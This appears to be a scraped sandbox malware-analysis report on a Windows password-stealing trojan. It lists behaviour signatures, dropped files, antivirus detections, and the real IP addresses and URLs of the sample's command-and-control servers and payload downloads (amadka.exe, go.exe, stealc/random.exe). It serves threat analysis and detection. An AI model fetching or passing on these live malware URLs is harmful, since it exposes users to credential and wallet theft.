                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Process Injection
                        DCSync251
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465915 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 16 other signatures 2->66 9 SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe 36 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 2 other processes 2->18 process3 dnsIp4 56 85.28.47.4, 63880, 63895, 80 GES-ASRU Russian Federation 9->56 58 77.91.77.81, 63881, 63894, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->58 46 C:\Users\user\AppData\...\BGIIDAEBGC.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->50 dropped 52 11 other files (7 malicious) 9->52 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Tries to steal Mail credentials (via file / registry access) 9->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 9->96 104 4 other signatures 9->104 20 cmd.exe 1 9->20         started        22 cmd.exe 2 9->22         started        98 Hides threads from debuggers 14->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->100 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->102 file5 signatures6 process7 process8 24 BGIIDAEBGC.exe 4 20->24         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        file9 44 C:\Users\user\AppData\Local\...\explorti.exe, PE32 24->44 dropped 84 Antivirus detection for dropped file 24->84 86 Detected unpacking (changes PE section rights) 24->86 88 Machine Learning detection for dropped file 24->88 90 5 other signatures 24->90 32 explorti.exe 16 24->32         started        signatures10 process11 dnsIp12 54 77.91.77.82, 63893, 63896, 63897 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 32->54 40 C:\Users\user\AppData\...\a37ec701f3.exe, PE32 32->40 dropped 42 C:\Users\user\AppData\Local\...\random[1].exe, PE32 32->42 dropped 68 Antivirus detection for dropped file 32->68 70 Detected unpacking (changes PE section rights) 32->70 72 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->72 74 5 other signatures 32->74 37 a37ec701f3.exe 12 32->37         started        file13 signatures14 process15 signatures16 76 Antivirus detection for dropped file 37->76 78 Multi AV Scanner detection for dropped file 37->78 80 Detected unpacking (changes PE section rights) 37->80 82 2 other signatures 37->82

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe45%ReversingLabsWin32.Trojan.Generic
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe45%VirustotalBrowse
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe100%AviraTR/Crypt.ZPACK.Gen
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe45%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe45%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        http://77.91.77.82/Hun4Ko/index.phpQ0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe100%Avira URL Cloudphishing
                        http://upx.sf.net0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        https://support.mozilla.org0%URL Reputationsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        http://85.28.47.4/920475a59bac849d.phpFBF100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exe100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll=100%Avira URL Cloudmalware
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://85.28.47.4/100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpQ22%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe27%VirustotalBrowse
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%Avira URL Cloudsafe
                        http://85.28.47.4/18%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpV0%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exe27%VirustotalBrowse
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php40%Avira URL Cloudsafe
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpmespace0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/nss3.dll2100%Avira URL Cloudmalware
                        http://85.28.47.4/920475a59bac849d.php4100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php24%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpV22%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php421%VirustotalBrowse
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php22%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.php414%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll6%VirustotalBrowse
                        http://85.28.47.4/a100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/nss3.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/rBJ100%Avira URL Cloudmalware
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll7%VirustotalBrowse
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpmW0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/nss3.dll9%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe00100%Avira URL Cloudphishing
                        http://77.91.77.82/0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll7%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe0025%VirustotalBrowse
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll100%Avira URL Cloudmalware
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.php100%Avira URL Cloudmalware
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpqWp0%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exeData100%Avira URL Cloudphishing
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll6%VirustotalBrowse
                        http://77.91.77.81/stealc/random.exe100%Avira URL Cloudmalware
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        http://77.91.77.82/23%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exe00100%Avira URL Cloudphishing
                        http://85.28.47.4/920475a59bac849d.php23%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exea100%Avira URL Cloudphishing
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpSW0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dll100%Avira URL Cloudmalware
                        http://85.28.47.4100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpgW0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exem100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpl0%Avira URL Cloudsafe
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%Avira URL Cloudsafe
                        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
                        http://85.28.47.4/920475a59bac849d.phpnB~100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php5W0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpYW(0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllS100%Avira URL Cloudmalware
                        http://77.91.77.81/stealc/random.exe50673b5d7X100%Avira URL Cloudphishing
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://77.91.77.81/mine/amadka.exetrue
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phptrue
                        • 24%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.4/69934896f997d5bb/softokn3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/mozglue.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dlltrue
                        • 9%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phptrue
                        • 23%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFEHJJKFCBGIDGHIECGCBKFHIEBG.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpQexplorti.exe, 00000008.00000002.4134557911.0000000001369000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exeSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpfalse
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpFBFa37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.000000000144B000.00000004.00000020.00020000.00000000.sdmptrue
                        • 18%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, random[1].exe.8.dr, a37ec701f3.exe.8.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, random[1].exe.8.dr, a37ec701f3.exe.8.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E1D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpVexplorti.exe, 00000008.00000002.4134557911.0000000001369000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php4explorti.exe, 00000008.00000002.4134557911.00000000012E1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiKKKJKEBKFCAAECAAAAAE.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpmespaceexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dll2SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.php4a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 14%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmptrue
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/aa37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/rBJa37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.sqlite.org/copyright.html.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882766834.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpmWexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe00SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmptrue
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/explorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmptrue
                        • 23%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.mozilla.com/en-US/blocklist/SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpqWpexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exeDataSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.81/stealc/random.exeexplorti.exe, 00000008.00000002.4134557911.000000000130F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.81/cost/go.exe00SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.81/mine/amadka.exeaSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://upx.sf.netAmcache.hve.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E1D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpSWexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.ecosia.org/newtab/SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEHJJKFCBGIDGHIECGCBKFHIEBG.0.drfalse
                        • URL Reputation: safe
                        unknown
